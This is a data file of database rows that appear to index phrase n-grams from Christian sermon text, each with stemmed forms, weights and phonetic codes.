(285716, 'out the doctrine', 'out the doctrine', 0, 1, 1.5333, 'O32365', 1, '*'),
(285717, 'out your salvation', 'out your salvation', 0, 1, 1.6, 'O3624135', 1, '*'),
(285718, 'overcome till', 'overcom till', 0, 1, 1.4333, 'O162534', 1, '*'),
(285719, 'overcome till the', 'overcom till the', 0, 1, 1.5667, 'O1625343', 1, '*'),
(285720, 'own selves', 'own selves', 0, 1, 1.3333, 'O52412', 1, '*'),
(285721, 'own selves how', 'own selves how', 0, 1, 1.4667, 'O52412', 1, '*'),
(285722, 'own selves know', 'own selves know', 0, 1, 1.5, 'O524125', 1, '*'),
(285723, 'people at', 'peopl at', 0, 1, 1.3, 'P430', 1, '*'),
(285724, 'people at stage', 'peopl at stage', 0, 1, 1.5, 'P43232', 1, '*'),
(285725, 'people to', 'peopl to', 0, 1, 1.3, 'P430', 2, '*'),
(285726, 'people to hell', 'peopl to hell', 0, 1, 1.4667, 'P434', 1, '*'),
(285727, 'phil.2', 'phil.2', 0, 0, 0.4, 'P400', 1, '*'),
(285728, 'phil.2 12', 'phil.2 12', 0, 1, 1.3, 'P400', 1, '*'),
(285729, 'phil.2 12 you', 'phil.2 12 you', 0, 1, 1.4333, 'P400', 1, '*'),
(285730, 'phil.3', 'phil.3', 0, 0, 0.4, 'P400', 1, '*'),
(285731, 'phil.3 7-10', 'phil.3 7-10', 0, 1, 1.3667, 'P400', 1, '*'),
(285732, 'phil.3 7-10 col', 'phil.3 7-10 col', 0, 1, 1.5, 'P424', 1, '*'),
(285733, 'popular business', 'popular business', 0, 1, 1.5333, 'P461252', 1, '*'),
(285734, 'popular business practice', 'popular business practice', 0, 1, 1.8333, 'P46125216232', 1, '*'),
(285735, 'practice relationships', 'practic relationships', 0, 1, 1.7333, 'P62326435212', 1, '*'),
(285736, 'practice relationships operations', 'practic relationships operations', 0, 1, 2, 'P6232643521216352', 1, '*'),
(285737, 'pray to', 'prai to', 0, 1, 1.2333, 'P630', 1, '*'),
(285738, 'pray to god', 'prai to god', 0, 1, 1.3667, 'P6323', 1, '*'),
(285739, 'profess', 'profess', 0, 0, 0.4667, 'P612', 1, '*'),
(285740, 'profess christianity', 'profess christianity', 0, 1, 1.6667, 'P61262353', 1, '*'),
(285741, 'profess christianity and', 'profess christianity and', 0, 1, 1.8, 'P6126235353', 1, '*'),
(285742, 'prove', 'prove', 0, 0, 0.3333, 'P610', 1, '*'),
(285743, 'prove your', 'prove your', 0, 1, 1.3333, 'P616', 1, '*'),
(285744, 'prove your own', 'prove your own', 0, 1, 1.4667, 'P6165', 1, '*'),
(285745, 'pure before', 'pure before', 0, 1, 1.3667, 'P616', 1, '*'),
(285746, 'pure before god', 'pure before god', 0, 1, 1.5, 'P61623', 1, '*'),
(285747, 'puts god', 'put god', 0, 1, 1.2667, 'P323', 1, '*'),
(285748, 'puts god first', 'put god first', 0, 1, 1.4667, 'P3231623', 1, '*'),
(285749, 'ready to forsake', 'readi to forsake', 0, 1, 1.5333, 'R3162', 1, '*'),
(285750, 'relationships operations', 'relationship operations', 0, 1, 1.8, 'R43521216352', 1, '*'),
(285751, 'relationships operations that', 'relationship operations that', 0, 1, 1.9667, 'R435212163523', 1, '*'),
(285752, 'reprobates', 'reprob', 0, 0, 0.6667, 'R16132', 1, '*'),
(285753, 'reprobates 6', 'reprob 6', 0, 1, 1.4, 'R16132', 1, '*'),
(285754, 'reprobates 6 but', 'reprob 6 but', 0, 1, 1.5333, 'R1613213', 1, '*'),
(285755, 'reprobates 7', 'reprob 7', 0, 1, 1.4, 'R16132', 1, '*'),
(285756, 'reprobates 7 now', 'reprob 7 now', 0, 1, 1.5333, 'R161325', 1, '*'),
(285757, 'reprobates 8', 'reprob 8', 0, 1, 1.4, 'R16132', 1, '*'),
(285758, 'reprobates 8 for', 'reprob 8 for', 0, 1, 1.5333, 'R1613216', 1, '*'),
(285759, 'rom.10', 'rom.10', 0, 0, 0.4, 'R500', 1, '*'),
(285760, 'rom.10 9-10', 'rom.10 9-10', 0, 1, 1.3667, 'R500', 1, '*'),
(285761, 'rom.10 9-10 john', 'rom.10 9-10 john', 0, 1, 1.5333, 'R525', 1, '*'),
(285762, 'salvation is', 'salvat is', 0, 1, 1.4, 'S41352', 2, '*'),
(285763, 'salvation is on', 'salvat is on', 0, 1, 1.5, 'S413525', 1, '*'),
(285764, 'salvation matt.24', 'salvat matt.24', 0, 1, 1.5667, 'S41353', 1, '*'),
(285765, 'salvation matt.24 13', 'salvat matt.24 13', 0, 1, 1.6667, 'S41353', 1, '*'),
(285766, 'salvation phil.2', 'salvat phil.2', 0, 1, 1.5333, 'S413514', 1, '*'),
(285767, 'salvation phil.2 12', 'salvat phil.2 12', 0, 1, 1.6333, 'S413514', 1, '*'),
(285768, 'salvation this', 'salvat this', 0, 1, 1.4667, 'S413532', 1, '*'),
(285769, 'salvation this happens', 'salvat this happens', 0, 1, 1.7333, 'S413532152', 1, '*'),
(285770, 'salvation to', 'salvat to', 0, 1, 1.4, 'S41353', 1, '*'),
(285771, 'salvation to be', 'salvat to be', 0, 1, 1.5, 'S413531', 1, '*'),
(285772, 'salvation with', 'salvat with', 0, 1, 1.4667, 'S41353', 1, '*'),
(285773, 'salvation with fear', 'salvat with fear', 0, 1, 1.6333, 'S4135316', 1, '*'),
(285774, 'saved everyday', 'save everyday', 0, 1, 1.4667, 'S13163', 1, '*'),
(285775, 'saved everyday separating', 'save everyday separating', 0, 1, 1.8333, 'S13163216352', 1, '*'),
(285776, 'saved no', 'save no', 0, 1, 1.2667, 'S135', 1, '*'),
(285777, 'saved no matter', 'save no matter', 0, 1, 1.5, 'S13536', 1, '*'),
(285778, 'saved ultimately', 'save ultimately', 0, 1, 1.5333, 'S1343534', 1, '*'),
(285779, 'saved ultimately which', 'save ultimately which', 0, 1, 1.7333, 'S13435342', 1, '*'),
(285780, 'saviour matt.7', 'saviour matt.7', 0, 1, 1.4667, 'S1653', 1, '*'),
(285781, 'saviour matt.7 21-24', 'saviour matt.7 21-24', 0, 1, 1.6667, 'S1653', 1, '*'),
(285782, 'security”', 'security”', 0, 0, 0.6, 'S630', 1, '*'),
(285783, 'security” i', 'security” i', 0, 1, 1.3667, 'S630', 1, '*'),
(285784, 'security” i e', 'security” i e', 0, 1, 1.4333, 'S630', 1, '*'),
(285785, 'seen to', 'seen to', 0, 1, 1.2333, 'S530', 1, '*'),
(285786, 'seen to be', 'seen to be', 0, 1, 1.3333, 'S531', 1, '*'),
(285787, 'selves', 'selv', 0, 0, 0.4, 'S412', 1, '*'),
(285788, 'selves how', 'selv how', 0, 1, 1.3333, 'S412', 1, '*'),
(285789, 'selves how that', 'selv how that', 0, 1, 1.5, 'S4123', 1, '*'),
(285790, 'selves know', 'selv know', 0, 1, 1.3667, 'S4125', 1, '*'),
(285791, 'selves know ye', 'selv know ye', 0, 1, 1.4667, 'S4125', 1, '*'),
(285792, 'separating', 'separ', 0, 0, 0.6667, 'S16352', 1, '*'),
(285793, 'separating yourself', 'separ yourself', 0, 1, 1.6333, 'S163526241', 1, '*'),
(285794, 'separating yourself from', 'separ yourself from', 0, 1, 1.8, 'S16352624165', 1, '*'),
(285795, 'shall know', 'shall know', 0, 1, 1.3333, 'S425', 1, '*'),
(285796, 'shall know that', 'shall know that', 0, 1, 1.5, 'S4253', 1, '*'),
(285797, 'should appear', 'should appear', 0, 1, 1.4333, 'S4316', 1, '*'),
(285798, 'should appear approved', 'should appear approved', 0, 1, 1.7333, 'S43161613', 1, '*'),
(285799, 'should do', 'should do', 0, 1, 1.3, 'S430', 1, '*'),
(285800, 'should do that', 'should do that', 0, 1, 1.4667, 'S430', 1, '*'),
(285801, 'simply means “christ', 'simpli means “christ', 0, 1, 1.6667, 'S51452623', 1, '*'),
(285802, 'sin mixed', 'sin mixed', 0, 1, 1.3, 'S523', 1, '*'),
(285803, 'sin mixed up', 'sin mixed up', 0, 1, 1.4, 'S5231', 1, '*'),
(285804, 'so they can', 'so they can', 0, 1, 1.3667, 'S325', 1, '*'),
(285805, 'stage one', 'stage one', 0, 1, 1.3, 'S325', 1, '*'),
(285806, 'stage one so', 'stage one so', 0, 1, 1.4, 'S3252', 1, '*'),
(285807, 'still go', 'still go', 0, 1, 1.2667, 'S342', 1, '*'),
(285808, 'still go to', 'still go to', 0, 1, 1.3667, 'S3423', 1, '*'),
(285809, 'stop people', 'stop people', 0, 1, 1.3667, 'S314', 1, '*'),
(285810, 'stop people at', 'stop people at', 0, 1, 1.4667, 'S3143', 1, '*'),
(285811, 'straight before', 'straight before', 0, 1, 1.5, 'S362316', 1, '*'),
(285812, 'straight before god', 'straight before god', 0, 1, 1.6333, 'S36231623', 1, '*'),
(285813, 'styles popular', 'style popular', 0, 1, 1.4667, 'S342146', 1, '*'),
(285814, 'styles popular business', 'style popular business', 0, 1, 1.7667, 'S3421461252', 1, '*'),
(285815, 'supposes', 'suppos', 0, 0, 0.5333, 'S120', 1, '*'),
(285816, 'supposes to', 'suppos to', 0, 1, 1.3667, 'S123', 1, '*'),
(285817, 'supposes to be', 'suppos to be', 0, 1, 1.4667, 'S1231', 1, '*'),
(285818, 'take people', 'take people', 0, 1, 1.3667, 'T214', 1, '*'),
(285819, 'take people to', 'take people to', 0, 1, 1.4667, 'T2143', 1, '*'),
(285820, 'text 2', 'text 2', 0, 1, 1.2, 'T230', 1, '*'),
(285821, 'text 2 corinthians', 'text 2 corinthians', 0, 1, 1.6, 'T23265352', 1, '*'),
(285822, 'that bring defilement', 'that bring defilement', 0, 1, 1.7, 'T165231453', 1, '*'),
(285823, 'that have sin', 'that have sin', 0, 1, 1.4333, 'T125', 1, '*'),
(285824, 'that is how', 'that is how', 0, 1, 1.3667, 'T200', 2, '*'),
(285825, 'that jesus christ', 'that jesus christ', 0, 1, 1.5667, 'T2623', 1, '*'),
(285826, 'that of jesus', 'that of jesus', 0, 1, 1.4333, 'T120', 1, '*'),
(285827, 'that we are', 'that we are', 0, 1, 1.3667, 'T600', 1, '*'),
(285828, 'that we should', 'that we should', 0, 1, 1.4667, 'T243', 1, '*'),
(285829, 'that which', 'that which', 0, 1, 1.3333, 'T200', 1, '*'),
(285830, 'that which is', 'that which is', 0, 1, 1.4333, 'T200', 1, '*'),
(285831, 'that ye do', 'that ye do', 0, 1, 1.3333, 'T000', 1, '*'),
(285832, 'that ye shall', 'that ye shall', 0, 1, 1.4333, 'T240', 1, '*'),
(285833, 'that ye should', 'that ye should', 0, 1, 1.4667, 'T243', 1, '*'),
(285834, 'the believers were', 'the believers were', 0, 1, 1.6, 'T141626', 1, '*'),
(285835, 'the christian weights', 'the christian weights', 0, 1, 1.7, 'T26235232', 1, '*'),
(285836, 'the end then', 'the end then', 0, 1, 1.4, 'T535', 1, '*'),
(285837, 'the faith', 'the faith', 0, 1, 1.3, 'T130', 1, '*'),
(285838, 'the faith prove', 'the faith prove', 0, 1, 1.5, 'T13161', 1, '*'),
(285839, 'the king\'s', 'the king', 0, 1, 1.3333, 'T252', 2, '*'),
(285840, 'the king\'s meat', 'the king meat', 0, 1, 1.5, 'T25253', 1, '*'),
(285841, 'the time of', 'the time of', 0, 1, 1.3667, 'T510', 1, '*'),
(285842, 'the truth but', 'the truth but', 0, 1, 1.4333, 'T6313', 1, '*'),
(285843, 'their behaviour', 'their behaviour', 0, 1, 1.5, 'T616', 1, '*'),
(285844, 'their behaviour mindset', 'their behaviour mindset', 0, 1, 1.7667, 'T6165323', 1, '*'),
(285845, 'them one', 'them one', 0, 1, 1.2667, 'T500', 1, '*'),
(285846, 'them one who', 'them one who', 0, 1, 1.4, 'T500', 1, '*'),
(285847, 'then you get', 'then you get', 0, 1, 1.4, 'T523', 1, '*'),
(285848, 'they can profess', 'thei can profess', 0, 1, 1.5333, 'T251612', 1, '*'),
(285849, 'things matt.10', 'thing matt.10', 0, 1, 1.4667, 'T5253', 1, '*'),
(285850, 'things matt.10 35', 'thing matt.10 35', 0, 1, 1.5667, 'T5253', 1, '*'),
(285851, 'things that bring', 'thing that bring', 0, 1, 1.5667, 'T5231652', 1, '*'),
(285852, 'this happens', 'thi happens', 0, 1, 1.4, 'T2152', 1, '*'),
(285853, 'this happens at', 'thi happens at', 0, 1, 1.5, 'T21523', 1, '*'),
(285854, 'though we', 'though we', 0, 1, 1.3, 'T200', 1, '*'),
(285855, 'though we be', 'though we be', 0, 1, 1.4, 'T210', 1, '*'),
(285856, 'three levels', 'three levels', 0, 1, 1.4, 'T64142', 1, '*'),
(285857, 'three levels and', 'three levels and', 0, 1, 1.5333, 'T6414253', 1, '*'),
(285858, 'till the', 'till the', 0, 1, 1.2667, 'T430', 1, '*'),
(285859, 'till the end', 'till the end', 0, 1, 1.4, 'T4353', 1, '*'),
(285860, 'time of confession', 'time of confession', 0, 1, 1.6, 'T5125125', 1, '*'),
(285861, 'to be complete', 'to be complete', 0, 1, 1.4667, 'T125143', 1, '*'),
(285862, 'to be like', 'to be like', 0, 1, 1.3333, 'T142', 1, '*'),
(285863, 'to be saved', 'to be saved', 0, 1, 1.3667, 'T1213', 1, '*'),
(285864, 'to be today', 'to be today', 0, 1, 1.3667, 'T130', 1, '*'),
(285865, 'to forsake', 'to forsake', 0, 1, 1.3333, 'T162', 1, '*'),
(285866, 'to forsake all', 'to forsake all', 0, 1, 1.4667, 'T1624', 1, '*'),
(285867, 'to forsake others', 'to forsake others', 0, 1, 1.5667, 'T162362', 1, '*'),
(285868, 'to god that', 'to god that', 0, 1, 1.3667, 'T230', 1, '*'),
(285869, 'to hell', 'to hell', 0, 1, 1.2333, 'T400', 1, '*'),
(285870, 'to hell ultimate', 'to hell ultimate', 0, 1, 1.5333, 'T4353', 1, '*'),
(285871, 'to hell watch', 'to hell watch', 0, 1, 1.4333, 'T432', 1, '*'),
(285872, 'to idols', 'to idols', 0, 1, 1.2667, 'T420', 1, '*'),
(285873, 'to idols dan.1', 'to idols dan.1', 0, 1, 1.4667, 'T4235', 1, '*'),
(285874, 'to keep his', 'to keep his', 0, 1, 1.3667, 'T212', 1, '*'),
(285875, 'to stop people', 'to stop people', 0, 1, 1.4667, 'T2314', 1, '*'),
(285876, 'to work out', 'to work out', 0, 1, 1.3667, 'T623', 1, '*'),
(285877, 'today your', 'todai your', 0, 1, 1.3333, 'T600', 1, '*'),
(285878, 'today your salvation', 'todai your salvation', 0, 1, 1.6667, 'T624135', 1, '*'),
(285879, 'trembles', 'trembl', 0, 0, 0.5333, 'T65142', 1, '*'),
(285880, 'trembles to', 'trembl to', 0, 1, 1.3667, 'T651423', 1, '*'),
(285881, 'trembles to keep', 'trembl to keep', 0, 1, 1.5333, 'T65142321', 1, '*'),
(285882, 'trembling', 'trembl', 0, 0, 0.6, 'T651452', 1, '*'),
(285883, 'trembling getting', 'trembl getting', 0, 1, 1.5667, 'T651452352', 1, '*'),
(285884, 'trembling getting your', 'trembl getting your', 0, 1, 1.7333, 'T6514523526', 1, '*'),
(285885, 'trust that', 'trust that', 0, 1, 1.3333, 'T623', 1, '*'),
(285886, 'trust that ye', 'trust that ye', 0, 1, 1.4333, 'T623', 1, '*'),
(285887, 'truth but', 'truth but', 0, 1, 1.3, 'T6313', 1, '*'),
(285888, 'truth but for', 'truth but for', 0, 1, 1.4333, 'T631316', 1, '*'),
(285889, 'ultimate', 'ultim', 0, 0, 0.5333, 'U4353', 1, '*'),
(285890, 'ultimate salvation', 'ultim salvation', 0, 1, 1.6, 'U435324135', 1, '*'),
(285891, 'ultimate salvation matt.24', 'ultim salvation matt.24', 0, 1, 1.8667, 'U4353241353', 1, '*'),
(285892, 'ultimately', 'ultim', 0, 0, 0.6667, 'U43534', 1, '*'),
(285893, 'ultimately which', 'ultim which', 0, 1, 1.5333, 'U435342', 1, '*'),
(285894, 'ultimately which is', 'ultim which is', 0, 1, 1.6333, 'U435342', 1, '*'),
(285895, 'up with them', 'up with them', 0, 1, 1.4, 'U135', 1, '*'),
(285896, 'values and manifestations', 'valu and manifestations', 0, 1, 1.8333, 'V4253512352', 1, '*'),
(285897, 'void', 'void', 0, 0, 0.2667, 'V300', 1, '*'),
(285898, 'void of', 'void of', 0, 1, 1.2333, 'V310', 1, '*'),
(285899, 'void of offence', 'void of offence', 0, 1, 1.5, 'V3152', 1, '*'),
(285900, 'wants to stop', 'want to stop', 0, 1, 1.4333, 'W5323231', 1, '*'),
(285901, 'watch out', 'watch out', 0, 1, 1.3, 'W323', 1, '*'),
(285902, 'watch out the', 'watch out the', 0, 1, 1.4333, 'W323', 1, '*'),
(285903, 'we are not', 'we are not', 0, 1, 1.3333, 'W653', 1, '*'),
(285904, 'we are supposes', 'we are supposes', 0, 1, 1.5, 'W6212', 1, '*'),
(285905, 'we be', 'we be', 0, 1, 1.1667, 'W100', 1, '*'),
(285906, 'we be as', 'we be as', 0, 1, 1.2667, 'W120', 1, '*'),
(285907, 'we should appear', 'we should appear', 0, 1, 1.5333, 'W24316', 1, '*'),
(285908, 'weights helps', 'weight helps', 0, 1, 1.4333, 'W232412', 1, '*'),
(285909, 'weights helps you', 'weight helps you', 0, 1, 1.5667, 'W232412', 1, '*'),
(285910, 'were first', 'were first', 0, 1, 1.3333, 'W61623', 1, '*'),
(285911, 'were first called', 'were first called', 0, 1, 1.5667, 'W61623243', 1, '*'),
(285912, 'were seen', 'were seen', 0, 1, 1.3, 'W625', 1, '*'),
(285913, 'were seen to', 'were seen to', 0, 1, 1.4, 'W6253', 1, '*'),
(285914, 'what is offered', 'what is offered', 0, 1, 1.5, 'W32163', 1, '*'),
(285915, 'when their', 'when their', 0, 1, 1.3333, 'W536', 1, '*'),
(285916, 'when their behaviour', 'when their behaviour', 0, 1, 1.6667, 'W53616', 1, '*'),
(285917, 'when you overcome', 'when you overcome', 0, 1, 1.5667, 'W51625', 1, '*'),
(285918, 'whether ye', 'whether ye', 0, 1, 1.3333, 'W360', 1, '*'),
(285919, 'whether ye be', 'whether ye be', 0, 1, 1.4333, 'W361', 1, '*'),
(285920, 'which is god\'s', 'which is god', 0, 1, 1.4667, 'W232', 1, '*'),
(285921, 'which is honest', 'which is honest', 0, 1, 1.5, 'W2523', 1, '*'),
(285922, 'who has accepted', 'who has accepted', 0, 1, 1.5333, 'W213', 1, '*'),
(285923, 'who has become', 'who has become', 0, 1, 1.4667, 'W2125', 1, '*'),
(285924, 'who has chosen', 'who has chosen', 0, 1, 1.4667, 'W250', 1, '*'),
(285925, 'who has not', 'who has not', 0, 1, 1.3667, 'W253', 1, '*'),
(285926, 'who is a', 'who is a', 0, 1, 1.2667, 'W200', 1, '*'),
(285927, 'who is ready', 'who is ready', 0, 1, 1.4, 'W263', 1, '*'),
(285928, 'who puts', 'who puts', 0, 1, 1.2667, 'W132', 1, '*'),
(285929, 'who puts god', 'who puts god', 0, 1, 1.4, 'W1323', 1, '*'),
(285930, 'who trembles', 'who trembles', 0, 1, 1.4, 'W365142', 1, '*'),
(285931, 'who trembles to', 'who trembles to', 0, 1, 1.5, 'W3651423', 1, '*'),
(285932, 'will take people', 'will take people', 0, 1, 1.5333, 'W43214', 1, '*'),
(285933, 'with fear', 'with fear', 0, 1, 1.3, 'W316', 1, '*'),
(285934, 'with fear and', 'with fear and', 0, 1, 1.4333, 'W31653', 1, '*'),
(285935, 'with them one', 'with them one', 0, 1, 1.4333, 'W350', 1, '*'),
(285936, 'with what is', 'with what is', 0, 1, 1.4, 'W320', 1, '*'),
(285937, 'work out', 'work out', 0, 1, 1.2667, 'W623', 2, '*'),
(285938, 'work out your', 'work out your', 0, 1, 1.4333, 'W6236', 1, '*'),
(285939, 'world and its', 'world and its', 0, 1, 1.4333, 'W643532', 1, '*'),
(285940, 'wrong doctrine', 'wrong doctrine', 0, 1, 1.4667, 'W65232365', 1, '*'),
(285941, 'wrong doctrine it', 'wrong doctrine it', 0, 1, 1.5667, 'W652323653', 1, '*'),
(285942, 'ye be', 'ye be', 0, 1, 1.1667, 'Y100', 1, '*'),
(285943, 'ye be in', 'ye be in', 0, 1, 1.2667, 'Y150', 1, '*'),
(285944, 'ye be reprobates', 'ye be reprobates', 0, 1, 1.5333, 'Y1616132', 1, '*'),
(285945, 'ye do', 'ye do', 0, 1, 1.1667, 'Y300', 1, '*'),
(285946, 'ye do no', 'ye do no', 0, 1, 1.2667, 'Y350', 1, '*'),
(285947, 'ye not', 'ye not', 0, 1, 1.2, 'Y530', 1, '*'),
(285948, 'ye not your', 'ye not your', 0, 1, 1.3667, 'Y536', 1, '*'),
(285949, 'ye shall', 'ye shall', 0, 1, 1.2667, 'Y240', 1, '*'),
(285950, 'ye shall know', 'ye shall know', 0, 1, 1.4333, 'Y2425', 1, '*'),
(285951, 'ye should', 'ye should', 0, 1, 1.3, 'Y243', 1, '*'),
(285952, 'ye should do', 'ye should do', 0, 1, 1.4, 'Y243', 1, '*'),
(285953, 'you except', 'you except', 0, 1, 1.3333, 'Y213', 1, '*'),
(285954, 'you except ye', 'you except ye', 0, 1, 1.4333, 'Y213', 1, '*'),
(285955, 'you get saved', 'you get saved', 0, 1, 1.4333, 'Y23213', 1, '*'),
(285956, 'you must experience', 'you must experience', 0, 1, 1.6333, 'Y52321652', 1, '*'),
(285957, 'you overcome', 'you overcome', 0, 1, 1.4, 'Y1625', 1, '*'),
(285958, 'you overcome till', 'you overcome till', 0, 1, 1.5667, 'Y162534', 1, '*'),
(285959, 'you to work', 'you to work', 0, 1, 1.3667, 'Y362', 1, '*'),
(285960, 'your conscience void', 'your conscience void', 0, 1, 1.6667, 'Y62525213', 1, '*'),
(285961, 'your life straight', 'your life straight', 0, 1, 1.6, 'Y64123623', 1, '*'),
(285962, 'your own selves', 'your own selves', 0, 1, 1.5, 'Y652412', 1, '*'),
(285963, 'your salvation', 'your salvation', 0, 1, 1.4667, 'Y624135', 1, '*'),
(285964, 'your salvation is', 'your salvation is', 0, 1, 1.5667, 'Y6241352', 1, '*'),
(285965, 'your salvation to', 'your salvation to', 0, 1, 1.5667, 'Y6241353', 1, '*'),
(285966, 'your salvation with', 'your salvation with', 0, 1, 1.6333, 'Y6241353', 1, '*'),
(285967, 'yourself from things', 'yourself from things', 0, 1, 1.6667, 'Y624165352', 1, '*'),
(285968, 'yourselves whether', 'yourselv whether', 0, 1, 1.6, 'Y6241236', 1, '*'),
(285969, 'yourselves whether ye', 'yourselv whether ye', 0, 1, 1.7, 'Y6241236', 1, '*'),
(285970, '“christ like”.', '“christ like”.', 0, 1, 1.4667, '“262342', 1, '*'),
(285971, '“christ like”. the', '“christ like”. the', 0, 1, 1.6, '“2623423', 1, '*'),
(285972, '“eternal', '“etern', 0, 0, 0.5333, '“3654', 1, '*'),
(285973, '“eternal security”', '“etern security”', 0, 1, 1.6, '“3654263', 1, '*'),
(285974, '“eternal security” i', '“etern security” i', 0, 1, 1.6667, '“3654263', 1, '*'),
(286270, '1 19-20', '1 19-20', 0, 1, 1.2333, '', 1, '*'),
(286271, '1 19-20 acts', '1 19-20 acts', 0, 1, 1.4, 'A232', 1, '*'),
(286272, '1 2-4 god', '1 2-4 god', 0, 1, 1.3, 'G300', 1, '*'),
(286273, '1 he', '1 he', 0, 1, 1.1333, 'H000', 1, '*'),
(286274, '1 he tests', '1 he tests', 0, 1, 1.3333, 'H3232', 1, '*'),
(286275, '1-11', '1-11', 0, 0, 0.4, '', 1, '*'),
(286276, '1-11 2kings', '1-11 2kings', 0, 1, 1.3667, 'K520', 1, '*'),
(286277, '1-11 2kings 5', '1-11 2kings 5', 0, 1, 1.4333, 'K520', 1, '*'),
(286278, '1-6 4', '1-6 4', 0, 1, 1.1667, '', 1, '*'),
(286279, '1-6 4 he', '1-6 4 he', 0, 1, 1.2667, 'H000', 1, '*'),
(286280, '10 amos', '10 amos', 0, 1, 1.2333, 'A520', 1, '*'),
(286281, '10 amos 5', '10 amos 5', 0, 1, 1.3, 'A520', 1, '*'),
(286282, '10-12 5', '10-12 5', 0, 1, 1.2333, '', 1, '*'),
(286283, '10-12 5 he', '10-12 5 he', 0, 1, 1.3333, 'H000', 1, '*'),
(286284, '12 matt.19', '12 matt.19', 0, 1, 1.3333, 'M300', 1, '*'),
(286285, '12 matt.19 16-21', '12 matt.19 16-21', 0, 1, 1.5333, 'M300', 1, '*'),
(286286, '12-13', '12-13', 0, 0, 0.5, '', 1, '*'),
(286287, '12-13 james', '12-13 james', 0, 1, 1.3667, 'J520', 1, '*'),
(286288, '12-13 james 1', '12-13 james 1', 0, 1, 1.4333, 'J520', 1, '*'),
(286289, '12-15', '12-15', 0, 0, 0.5, '', 1, '*'),
(286290, '12-15 here', '12-15 here', 0, 1, 1.3333, 'H600', 1, '*'),
(286291, '12-15 here are', '12-15 here are', 0, 1, 1.4667, 'H600', 1, '*'),
(286292, '13 15', '13 15', 0, 1, 1.1667, '', 1, '*'),
(286293, '13 15 1cor.10', '13 15 1cor.10', 0, 1, 1.4333, 'C600', 1, '*'),
(286294, '15 1cor.10', '15 1cor.10', 0, 1, 1.3333, 'C600', 1, '*'),
(286295, '15 1cor.10 12-13', '15 1cor.10 12-13', 0, 1, 1.5333, 'C600', 1, '*'),
(286296, '15-19', '15-19', 0, 0, 0.5, '', 1, '*'),
(286297, '15-19 learn', '15-19 learn', 0, 1, 1.3667, 'L650', 1, '*'),
(286298, '15-19 learn to', '15-19 learn to', 0, 1, 1.4667, 'L653', 1, '*'),
(286299, '16 2', '16 2', 0, 1, 1.1333, '', 1, '*'),
(286300, '16 2 all', '16 2 all', 0, 1, 1.2667, 'A400', 1, '*'),
(286301, '16 2 isaiah', '16 2 isaiah', 0, 1, 1.3667, 'I200', 1, '*'),
(286302, '16 for', '16 for', 0, 1, 1.2, 'F600', 1, '*'),
(286303, '16 for god', '16 for god', 0, 1, 1.3333, 'F623', 1, '*'),
(286304, '16-18', '16-18', 0, 0, 0.5, '', 1, '*'),
(286305, '16-18 john', '16-18 john', 0, 1, 1.3333, 'J500', 1, '*'),
(286306, '16-18 john 13', '16-18 john 13', 0, 1, 1.4333, 'J500', 1, '*'),
(286307, '16-21 for', '16-21 for', 0, 1, 1.3, 'F600', 1, '*'),
(286308, '16-21 for you', '16-21 for you', 0, 1, 1.4333, 'F600', 1, '*'),
(286309, '18-20', '18-20', 0, 0, 0.5, '', 1, '*'),
(286310, '18-20 gen.31', '18-20 gen.31', 0, 1, 1.4, 'G500', 1, '*'),
(286311, '18-20 gen.31 1-6', '18-20 gen.31 1-6', 0, 1, 1.5333, 'G500', 1, '*'),
(286312, '19-20 acts', '19-20 acts', 0, 1, 1.3333, 'A232', 1, '*'),
(286313, '19-20 acts 8', '19-20 acts 8', 0, 1, 1.4, 'A232', 1, '*'),
(286314, '1cor.10', '1cor.10', 0, 0, 0.4667, 'C600', 1, '*'),
(286315, '1cor.10 12-13', '1cor.10 12-13', 0, 1, 1.4333, 'C600', 1, '*'),
(286316, '1cor.10 12-13 james', '1cor.10 12-13 james', 0, 1, 1.6333, 'C6252', 1, '*'),
(286317, '1cor.11 31', '1cor.11 31', 0, 1, 1.3333, 'C600', 1, '*'),
(286318, '1cor.11 31 lean', '1cor.11 31 lean', 0, 1, 1.5, 'C645', 1, '*'),
(286319, '1king 21', '1king 21', 0, 1, 1.2667, 'K520', 1, '*'),
(286320, '1king 21 4-9', '1king 21 4-9', 0, 1, 1.4, 'K520', 1, '*'),
(286321, '1sam.15-21-22', '1sam.15-21-22', 0, 0, 0.8667, 'S500', 1, '*'),
(286322, '1sam.15-21-22 num.20', '1sam.15-21-22 num.20', 0, 1, 1.6667, 'S500', 1, '*'),
(286323, '1sam.15-21-22 num.20 10-12', '1sam.15-21-22 num.20 10-12', 0, 1, 1.8667, 'S500', 1, '*'),
(286324, '1sam.16', '1sam.16', 0, 0, 0.4667, 'S500', 1, '*'),
(286325, '1sam.16 7', '1sam.16 7', 0, 1, 1.3, 'S500', 1, '*'),
(286326, '1sam.16 7 luke', '1sam.16 7 luke', 0, 1, 1.4667, 'S542', 1, '*'),
(286327, '2 3 proverbs', '2 3 proverbs', 0, 1, 1.4, 'P61612', 1, '*'),
(286328, '2 3 talk', '2 3 talk', 0, 1, 1.2667, 'T420', 1, '*'),
(286329, '2 8-10', '2 8-10', 0, 1, 1.2, '', 1, '*'),
(286330, '2 8-10 1king', '2 8-10 1king', 0, 1, 1.4, 'K520', 1, '*'),
(286331, '2 all', '2 all', 0, 1, 1.1667, 'A400', 1, '*'),
(286332, '2 all the', '2 all the', 0, 1, 1.3, 'A430', 1, '*'),
(286333, '2 he', '2 he', 0, 1, 1.1333, 'H000', 1, '*'),
(286334, '2 he tests', '2 he tests', 0, 1, 1.3333, 'H3232', 1, '*'),
(286335, '2 isaiah', '2 isaiah', 0, 1, 1.2667, 'I200', 1, '*'),
(286336, '2 isaiah 26', '2 isaiah 26', 0, 1, 1.3667, 'I200', 1, '*'),
(286337, '2-4 god', '2-4 god', 0, 1, 1.2333, 'G300', 1, '*'),
(286338, '2-4 god does', '2-4 god does', 0, 1, 1.4, 'G320', 1, '*'),
(286339, '20-31', '20-31', 0, 0, 0.5, '', 1, '*'),
(286340, '20-31 patience', '20-31 patience', 0, 1, 1.4667, 'P352', 1, '*'),
(286341, '20-31 patience is', '20-31 patience is', 0, 1, 1.5667, 'P352', 1, '*'),
(286342, '20-31 ps.30', '20-31 ps.30', 0, 1, 1.3667, 'P200', 1, '*'),
(286343, '20-31 ps.30 56', '20-31 ps.30 56', 0, 1, 1.4667, 'P200', 1, '*'),
(286344, '21 4-9', '21 4-9', 0, 1, 1.2, '', 1, '*'),
(286345, '21 4-9 6', '21 4-9 6', 0, 1, 1.2667, '', 1, '*'),
(286346, '23-24', '23-24', 0, 0, 0.5, '', 1, '*'),
(286347, '23-24 to', '23-24 to', 0, 1, 1.2667, 'T000', 1, '*'),
